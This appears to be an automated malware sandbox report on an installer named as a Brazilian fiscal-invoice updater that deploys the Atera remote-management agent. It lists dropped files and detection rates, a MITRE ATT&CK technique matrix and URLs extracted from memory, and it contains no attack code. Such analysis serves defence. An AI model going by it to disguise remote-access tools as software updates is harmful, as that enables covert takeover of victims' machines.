Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DFA216B805B95A0808.TMP, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, type: DROPPED

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

Code function: 36_2_00007FFDF0ECB9F0 GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_snprintf,OutputDebugStringA,

36_2_00007FFDF0ECB9F0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Replication Through Removable Media	641 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	22 Windows Service	11 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	22 Windows Service	111 Process Injection	31 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Timestomp	NTDS	275 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	11 Service Execution	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	781 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	123 Masquerading	DCSync	11 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	371 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	371 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Rundll32	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Atualizador_Fiscal_NFe_37882912.msi	24%	ReversingLabs	Win32.Trojan.Atera

Dropped Files

Source	Detection	Scanner	Label
57a75b.rbf (copy)	26%	ReversingLabs	Win32.PUA.Atera
57a75d.rbf (copy)	0%	ReversingLabs
57a75e.rbf (copy)	0%	ReversingLabs
57a75f.rbf (copy)	0%	ReversingLabs
57a760.rbf (copy)	0%	ReversingLabs
57a761.rbf (copy)	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	26%	ReversingLabs	Win32.PUA.Atera
C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dll	0%	ReversingLabs
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dll	0%	ReversingLabs

Name	Source	Malicious
http://www.oracle.com/technetwork/java/javase/terms/license/index.html	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/api/v2/package/javaruntime-platformspecific/7.0.79.20161125	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/api/v2/package/server-jre/8.0.192	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zip	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.datacontract.org	AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/packages/asciidoctorj/2.5.13	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/adoptium/jdk8u/blob/master/LICENSE	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://adoptopenjdk.net/	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3074000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkgX	AgentPackageTicketing.exe, 00000031.00000002.2962491449.0000021F25809000.00000004.00000800.00020000.00000000.sdmp	false
https://nlog-project.org/	AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2219739634.00000247F8C28000.00000002.00000001.01000000.00000023.sdmp	false
https://agent-api.atera.com/Production/Agent/track-event	rundll32.exe, 00000004.00000002.1766749834.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1766749834.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.00000000049A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.0000000004A47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.0000000004960000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/corretto/corretto-8/blob/develop/LICENSE	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/24.3/AGENTPACKAGESTREMOTE.ZIP	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/dfb304ca-1bde-49cc-a755	AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5000A2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.25%2B9/OpenJDK11U-jre_x64_	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
http://openjdk.java.net/legal/	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.datacontract.org/2004/07/System.ServiceProcess	AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp	false
https://wiki.openjdk.java.net/display/JDKUpdates/JDK11u	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://my.splashtop.com/csrs/win	AgentPackageSTRemote.exe, 00000021.00000000.2113797571.0000023071932000.00000002.00000001.01000000.0000001A.sdmp	false
HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.AVAILABILITY/0.16/AGENT.PACKAGE.AVAILABILITY.Z	AteraAgent.exe, 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstaller	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	false
https://agent-api.atera.com/Production/Agent/dynamic-fields/	AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF496000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/30.2/AgentPackageTicketing.zip	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	false
https://gist.github.com/choco-bot/3c8928b5ffeea000c44e9639f29bbca9	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/api/v2/package/liberica17jre/17.0.13.12	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
http://my.splashtop.com	AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001A4000.00000004.00000800.00020000.00000000.sdmp	false
HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEOSUPDATES/20.9/AGENTPACKAGEOSUPDATES.ZIP	AteraAgent.exe, 00000018.00000002.2666352179.0000025100136000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/api/v2/P	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://cdn.statically.io/gh/asciidoctor/brand/b9cf5e27/logo/logo-fill-color.svg	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://westeurope-5.in.applicationinsights.azure.com/;LiveEndpoint=https://westeurope.livediagnosti	AgentPackageTicketing.exe, 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp	false
https://download.splashtop.com/csrs/Splashtop_Streamer_Win_DEPLOY_INSTALLER_v3.7.2.4.exe	AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001C9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001C5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2945403740.00000230001A4000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zip	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	false
https://asciidoctor.zulipchat.com/	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://www.nuget.org/packages/NLog.Web.AspNetCore	AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2219739634.00000247F8C28000.00000002.00000001.01000000.00000023.sdmp	false
https://github.com/flyway/flyway	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://rawcdn.githack.com/ajshastri/chocolatey-packages/a698d21b3c63b9ff7e01f442f37cdb7ecf89925a/ic	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3024000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/package/ReportAbuse/flyway.commandline.withjre/10.21.0	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
http://crl4.digi	AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp	false
https://community.chocolatey.org	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB302C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB2E41000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/packages/adoptopenjdk8openj9jre/8.292.10	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEAGENTINFORMATION/38.3/AGENTPACKAGEAGENTINFORMATI	AteraAgent.exe, 0000000E.00000002.2356972366.000001A500167000.00000004.00000800.00020000.00000000.sdmp	false
https://gist.github.com/choco-bot/d603f431437f5a02261645bc3bc0af37	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	false
https://josm.openstreetmap.de/report	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/AdoptOpenJDK/openjdk11-binaries/releases/download/jdk-11.0.11%2B9_openj9-0.26.0/O	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk14jre/14.0.2.1200	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
http://api.nuget.org	AgentPackageTicketing.exe, 00000031.00000002.2962491449.0000021F25A01000.00000004.00000800.00020000.00000000.sdmp	false
http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT	AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp	false
https://ps.atera.com/a	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	false
https://urn.to/r/sds_see	AgentPackageMonitoring.exe, 00000024.00000002.2218789671.00000247F8AE2000.00000002.00000001.01000000.00000022.sdmp	false
https://docs.aws.amazon.com/corretto/	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/24.3/AgentPackageSTRemote.ziph	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/packages/adoptopenjdk11openj9jre/11.0.11.900	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
